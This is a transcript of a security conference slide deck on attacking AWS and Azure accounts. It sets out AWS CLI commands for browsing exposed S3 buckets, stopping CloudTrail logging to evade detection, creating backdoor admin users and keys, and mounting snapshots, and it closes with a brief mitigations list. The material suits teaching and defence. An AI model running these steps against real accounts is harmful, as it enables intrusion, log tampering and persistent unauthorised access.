![Virtually Pwned: Hacking VMware [ITA - SMAU10]](https://static.fdocuments.us/doc/165x107/54852f285806b590588b46ff/virtually-pwned-hacking-vmware-ita-smau10.jpg)
Pwned Cloud Society - BsidesSLC 2017
69
PWNED CLOUD SOCIETY: Exploiting and Expanding Access within Azure & AWS
-
Upload
bryce-kunz -
Category
Technology
-
view
359 -
download
1
Transcript of Pwned Cloud Society - BsidesSLC 2017
PWNEDCLOUD SOCIETY:
Exploiting and Expanding Access within Azure & AWS
BRYCE KUNZ
Bryce Kunz - @TweekFawkes
@TweekFawkes
Prior Work Experience:• Adobe DMa – Red Team• DoD/NSA – Exploitation• DHS/OneNet – Defense
Trainings & Sessions• RSA – mesos/docker• SAINTCON – osquery• BsidesLV – mesos/docker• Derbycon - WhiteLightning
CLOUD…
Bryce Kunz - @TweekFawkes
… only one thing is for sure …
AWS
SO MUCH…
Bryce Kunz - @TweekFawkes
… only one thing is for sure …
AWS Azure
SOO MUCH…
Bryce Kunz - @TweekFawkes
… only one thing is for sure …
AWS Azure Google
SOOO MUCH…
Bryce Kunz - @TweekFawkes
… only one thing is for sure …
AWS Azure GoogleRackspace
NEW-NEW
Bryce Kunz - @TweekFawkes
… they want that new-new …
AWS Azure GoogleRackspace etc…
OLD IS NEW
Bryce Kunz - @TweekFawkes
… but really it’s not that much different …
OLD WAYS
Bryce Kunz - @TweekFawkes
… push code …… jenkins …… do work son …
CIBatch Jobs
Web
Dev
Code
NEW
Bryce Kunz - @TweekFawkes
… code …… some overpriced hipster services …… do work …
CIBatch Jobs
Web
Dev
S3 BucketBatch
Lambda
Code CodeDeploy
ADMINS
Bryce Kunz - @TweekFawkes
... admin …
AD/LDAP
CIBatch Jobs
Web Admin
Dev
Code
NEW ADMIN
Bryce Kunz - @TweekFawkes
… admins got to admin …
AD/LDAP
CIBatch Jobs
Web Admin
Dev
Management Console
S3 BucketBatch
Lambda
Code CodeDeploy
DEVOPS
Bryce Kunz - @TweekFawkes
… DevOp-ocalypse …
AD/LDAP
CIBatch Jobs
Web DevOps Management Console
S3 BucketBatch
Lambda
Code CodeDeploy
DEVOPS
Bryce Kunz - @TweekFawkes
… DevOp-ocalypse …
AD/LDAP
CIBatch Jobs
Web DevOps Management Console
S3 BucketBatch
Lambda
Code CodeDeploy
BAD DAYS
Bryce Kunz - @TweekFawkes
…happen…
BAD DAYS
Bryce Kunz - @TweekFawkes
… $50k!?!?!?
BAD DAYS
Bryce Kunz - @TweekFawkes
…EC2 instances destroyed…
INITIAL ACCESS
Bryce Kunz - @TweekFawkes
Find a AWS Secrets• Open Source Intel• Code Repositories• Deployment Tools• Configuration Files
PASTEBIN
Bryce Kunz - @TweekFawkes
Find a AWS Secrets• Open Source Intel• - PasteBin.com
GITHUB
Bryce Kunz - @TweekFawkes
Find a AWS Secrets• Open Source Intel• - PasteBin.com• - GitHub.com
REPOS
Bryce Kunz - @TweekFawkes
Find a AWS Secrets• Open Source Intel• Code Repositories• - BitBucket, GitLab• - Gerrit, GitBlit, Git• - SVN, etc…
DEPLOYACCESS
Bryce Kunz - @TweekFawkes
Find a AWS Secrets• Open Source Intel• Code Repositories• Deployment Tools• - Puppet, etc…• - Jenkins, etc…
HACK & D/LACCESS
Bryce Kunz - @TweekFawkes
Find a AWS Secrets• Open Source Intel• Code Repositories• Deployment Tools• Configuration Files• - Classic Hacks• -- D/L Secrets
WHAT…
Bryce Kunz - @TweekFawkes
Services- Many Services- API Access- User Access
… is the point?
SOMANY…
Bryce Kunz - @TweekFawkes
…
TYPES
Bryce Kunz - @TweekFawkes
…
API
Bryce Kunz - @TweekFawkes
…
USERS
Bryce Kunz - @TweekFawkes
…
SETUP
Bryce Kunz - @TweekFawkes
Preparation• New EC2 Instance• Setup AWS Tools
On an Ubuntu 16.x EC2 instance…
apt-get updateapt-get install python-pippip install aws-shellpip install awscli
S3 BUCKETS
Bryce Kunz - @TweekFawkes
…
S3 Bucket
AmazonS3
REGION
ping -c3 exam.pledig +nocmd exam.ple any +multiline +noall +answer nslookup 54.231.184.255
S3 Buckets• Find Region
S3 Bucket
AmazonS3
S3 BUCKETS
aws s3 ls s3://exam.ple/ --no-sign-request --region us-west-2
S3 Buckets• Find Region• Browse Files
S3 Bucket
AmazonS3
S3 BUCKETS
aws s3 ls s3://exam.ple/ --no-sign-request --region us-west-2
S3 Buckets• World Browsable
S3 Bucket
AmazonS3
S3 BUCKETS
aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2
S3 Buckets• World Browsable
S3 Bucket
AmazonS3
S3 BUCKETS
aws s3 ls s3://...exam.ple/ --no-sign-request --region us-west-2
S3 Buckets• Sensitive Files
S3 Bucket
AmazonS3
S3 BUCKETS
aws s3 sync s3://…exam.ple/ . --no-sign-request --region us-west-2
S3 Buckets• Sensitive Files
S3 Bucket
AmazonS3
S3 BUCKETS
git log
S3 Buckets• Sensitive Files• - GIT• - SVN• - etc…
S3 Bucket
AmazonS3
S3 BUCKETS
git checkout f7c…
S3 Buckets• Sensitive Files
S3 Bucket
AmazonS3
LEVERAGE SECRETS
Bryce Kunz - @TweekFawkes
Preparation• New EC2 Instance• Setup AWS Tools• Leverage Secrets
CONFIGURE
aws configure --profile example
Preparation• New EC2 Instance• Setup AWS Tools• Leverage Secrets
AWS CLI AWS Cloud
VERIFY
(remove the spaces around the = character for easier scripts)
Preparation• New EC2 Instance• Setup AWS Tools• Leverage Secrets
AWS CLI AWS Cloud
WHOAMI
aws --profile example sts get-caller-identity
Survey Access• Who Are We?
AWS CLI AWS Cloud
IAM WHO
aws --profile example iam get-user
Survey Access• Who Are We?• IAM Who?
AWS CLI AWS Cloud
LOGGING
Bryce Kunz - @TweekFawkes
Survey Access• Who Are We?• Logging?
AWSCloudTrailAWS CLI AWS Cloud
LOGGING?
aws --profile api_cloudtrail cloudtrail describe-trails
Survey Access• Who Are We?• Logging?
AWSCloudTrail
AWSCloudTrailAWS CLI AWS Cloud
STOP-LOGS
aws --profile api_cloudtrail configure set region us-east-1
aws --profile api_cloudtrail cloudtrail stop-logging --name "arn:aws:cloudtrail:us-east-1:…:trail/…"
Survey Access• Who Are We?• Logging?
AWSCloudTrail
OPSEC? Survey Access• Who Are We?• Logging?
AWSCloudTrail
AWSCloudTrailAWS CLI AWS Cloud
LOGGING?
aws --profile api_cloudtrail cloudtrail describe-trails
Survey Access• Who Are We?• Logging?
AWSCloudTrail
AWSCloudTrailAWS CLI AWS Cloud
NO MULTI
aws --profile api_cloudtrail configure set region us-east-1
aws --profile api_cloudtrail cloudtrail update-trail --name "arn:aws:cloudtrail:us-east-1:…:trail/…" --no-is-multi-region-trail --no-include-global-service-events
Stops logging in all regions…• EXCEPT the HomeRegion
AWSCloudTrail
OPSEC…
…
Stops logging in all regions…• EXCEPT the HomeRegion
AWSCloudTrail
PERSIST
Bryce Kunz - @TweekFawkes
Persistence• Session Token• - Valid for 12 Hours• Add Key• Add Account
AWS CLI AWS Cloud
PERSIST
aws --profile api_cloudtrail sts get-session-token
Persistence• Session Token• - Valid for 12 Hours
AWS CLI AWS Cloud
SETUP
vi ~/.aws/credentials
Persistence• Session Token• - Valid for 12 Hours
AWS CLI AWS Cloud
SESSION
aws --profile sessionTokens sts get-caller-identity
Persistence• Session Token• - Valid for 12 Hours
AWS CLI AWS Cloud
ADD KEY
To an already existing user….
Persistence• Session Token• - Valid for 12 Hours• Add Key
AWS CLI AWS Cloud
ADD KEY Persistence• Session Token• - Valid for 12 Hours• Add Key
aws --profile api_iam iam list-users
AWS CLI AWS Cloud
ADD KEY Persistence• Session Token• - Valid for 12 Hours• Add Key
aws --profile api_iam iam create-access-key --user-name test
AWS CLI AWS Cloud
ADD USER
Bryce Kunz - @TweekFawkes
Persistence• Session Token• - Valid for 12 Hours• Add Key• Add User
AWS CLI AWS Cloud
ADD USER
aws --profile api_iam iam create-user --user-name mryanaws --profile api_iam iam add-user-to-group --user-name mryan --group-name Admin
Persistence• Session Token• - Valid for 12 Hours• Add Key• Add User
ADD KEY
aws --profile api_iam iam create-access-key --user-name mryan
Persistence• Session Token• - Valid for 12 Hours• Add Key• Add User
ADD PASS
aws --profile api_iam iam create-login-profile --user-name mryan --password examplepass
Persistence• Session Token• - Valid for 12 Hours• Add Key• Add User
NEW EC2
Bryce Kunz - @TweekFawkes
…
EC2 META
Metadata Service: 169.254.169.254
curl http://169.254.169.254/latest/meta-data/
RFC-3927: https://tools.ietf.org/html/rfc3927AWS: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.htmlAWS Query Tool: https://aws.amazon.com/code/1825
…
AZURE META
Metadata Service: 169.254.169.254curl http://169.254.169.254/metadata/v1/maintenancecurl http://169.254.169.254/metadata/v1/InstanceInfo(these are mostly useless for hackers…) but useful information is copied into the …
/var/lib/waagent directory when the instance is created… (root access needed)• IP address, hostname, subscription ID, resource group name, etc…
…
SNAPS &IAM
aws --profile api_ec2 ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
mount /dev/xvdb1 /mnt
find /mnt -type f -mtime -1 2>/dev/null | grep -v "/var/" | grep -v "/proc/" | grep -v "/dev/" | grep -v "/sys/" | grep -v "/run/" | less
…
HARD BOOT
Bryce Kunz - @TweekFawkes
…
Horrible OPSEC but it works…- Power off a server- Mount the server’s hard drive using another EC2- Modify the server for remote access (e.g. add an SSH key to root user)- Power back on the server & PROFIT!
MITIGATIONS• Single Purpose Secrets• Limited the Access of each Secret• Create roles and limit the access of each role• You can ACL off secrets to only work from certain IP addresses• Log API calls (e.g. cloudtrail)• Never use root secrets (use as a break glass account only)• Rotate Secrets Frequently• Encrypt secrets within GIT and other data stores
…
THANKS!
Bryce Kunz - @TweekFawkes
…
References • http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud/hint2.html
• https://www.slideshare.net/chrisgates/devoops-attacks-and-defenses-for-devops-toolchains
• http://flaws.cloud/
• https://danielgrzelak.com/disrupting-aws-logging-a42e437d6594
• https://danielgrzelak.com/backdooring-an-aws-account-da007d36f8f9
• https://danielgrzelak.com/exploring-an-aws-account-after-pwning-it-ff629c2aae39
• http://docplayer.net/24014561-Defending-the-cloud-from-the-full-stack-hack.html
